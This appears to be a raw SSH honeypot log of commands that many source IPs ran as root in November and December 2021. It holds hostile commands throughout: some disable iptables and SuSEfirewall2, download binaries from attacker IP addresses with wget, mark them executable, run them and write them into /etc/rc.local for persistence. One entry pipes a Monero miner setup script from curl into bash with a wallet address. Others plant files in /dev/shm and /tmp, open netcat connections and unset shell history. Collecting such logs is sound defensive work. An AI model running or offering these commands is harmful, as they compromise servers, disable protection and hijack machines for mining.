From 137.220.194.92 28-Nov-2021 16:30:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://137.220.194.14:9090/xx;chmod 777 xx;./xx;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://137.220.194.14:9090/xx
chmod 777 xx
./xx

From 137.220.194.92 28-Nov-2021 16:31:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://137.220.194.14:9090/xxarm;chmod 777 xxarm;./xxarm;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://137.220.194.14:9090/xxarm
chmod 777 xxarm
./xxarm

From 222.186.133.160 28-Nov-2021 20:00:48 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/fff;chmod 777 fff;./fff;echo "cd /tmp/">>/etc/rc.local;echo "./fff&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/fff
chmod 777 fff
./fff
echo "cd /tmp/">>/etc/rc.local
echo "./fff
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 29-Nov-2021 07:19:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/cvv;chmod 777 cvv;./cvv;echo "cd /tmp/">>/etc/rc.local;echo "./cvv&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/cvv
chmod 777 cvv
./cvv
echo "cd /tmp/">>/etc/rc.local
echo "./cvv
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 129.227.219.28 29-Nov-2021 08:16:32 ssh2 root
w
lscpu
ls -a
id richard
halt

From 38.91.102.77 29-Nov-2021 09:35:55 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';nproc;curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
nproc
curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 2.56.59.114 29-Nov-2021 15:58:07 ssh2 root
Exec hive-passwd nqmashrabotatuk1234; pkill Xorg; pkill x11vnc; service shellinabox stop
hive-passwd nqmashrabotatuk1234
pkill Xorg
pkill x11vnc
service shellinabox stop

From 2.56.59.114 29-Nov-2021 18:59:01 ssh2 root
Exec hive-passwd nqmashrabotatuk123; pkill Xorg; pkill x11vnc; service shellinabox stop
hive-passwd nqmashrabotatuk123
pkill Xorg
pkill x11vnc
service shellinabox stop

From 5.253.235.118 30-Nov-2021 21:56:47 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.16.242 30-Nov-2021 22:03:15 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.16.242 30-Nov-2021 22:23:15 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 13.213.51.41 30-Nov-2021 22:25:16 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 193.8.4.40 30-Nov-2021 22:26:31 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 120.53.124.60 30-Nov-2021 22:29:12 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 13.213.51.41 30-Nov-2021 22:30:40 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 120.53.124.60 30-Nov-2021 22:31:12 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 120.53.124.60 30-Nov-2021 22:31:54 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 176.28.20.18 30-Nov-2021 22:34:09 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 101.34.187.167 30-Nov-2021 22:36:31 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 79.175.151.220 30-Nov-2021 22:51:00 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 101.34.17.83 30-Nov-2021 22:55:42 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 101.34.17.83 30-Nov-2021 22:56:47 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 101.34.17.83 30-Nov-2021 22:57:23 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 36.250.216.181 30-Nov-2021 23:25:35 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 163.197.0.2 30-Nov-2021 23:37:49 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 200.11.146.8 30-Nov-2021 23:39:55 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 200.11.146.8 30-Nov-2021 23:41:07 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 200.11.146.8 30-Nov-2021 23:45:09 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 150.107.95.20 30-Nov-2021 23:50:31 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 163.197.8.123 30-Nov-2021 23:50:46 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 148.3.253.73 1-Dec-2021 00:06:33 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 101.34.187.167 1-Dec-2021 00:12:41 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 101.34.187.167 1-Dec-2021 00:13:23 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 136.233.148.82 1-Dec-2021 00:17:02 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 49.232.149.173 1-Dec-2021 00:20:24 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 122.233.109.9 1-Dec-2021 00:23:51 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 13.213.51.41 1-Dec-2021 00:25:54 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 00:26:49 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec unset HISTFILE ; unset HISTSIZE
unset HISTFILE
unset HISTSIZE

From 167.99.241.156 1-Dec-2021 00:27:44 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 00:27:54 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 36.250.216.181 1-Dec-2021 00:28:03 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 212.129.136.88 1-Dec-2021 00:30:06 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 163.197.0.2 1-Dec-2021 00:32:49 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 51.77.58.15 1-Dec-2021 00:35:13 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 190.202.94.42 1-Dec-2021 00:35:23 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 51.77.58.15 1-Dec-2021 00:35:28 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 163.197.8.123 1-Dec-2021 00:46:03 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 163.197.8.123 1-Dec-2021 00:47:24 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 163.197.0.2 1-Dec-2021 00:48:05 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 136.233.148.82 1-Dec-2021 00:49:12 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 43.225.67.105 1-Dec-2021 00:50:16 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 3.70.171.168 1-Dec-2021 00:52:49 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 163.197.8.123 1-Dec-2021 00:53:28 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.8.123 1-Dec-2021 00:54:33 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 83.56.9.96 1-Dec-2021 00:55:17 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 163.197.8.123 1-Dec-2021 00:55:41 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 163.197.8.123 1-Dec-2021 00:56:19 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 163.197.24.62 1-Dec-2021 00:56:55 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 136.233.148.82 1-Dec-2021 00:57:32 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 163.197.8.123 1-Dec-2021 00:59:42 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 161.202.189.162 1-Dec-2021 01:01:30 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 01:02:15 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 161.202.189.162 1-Dec-2021 01:02:59 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 163.197.24.62 1-Dec-2021 01:04:22 ssh2 root
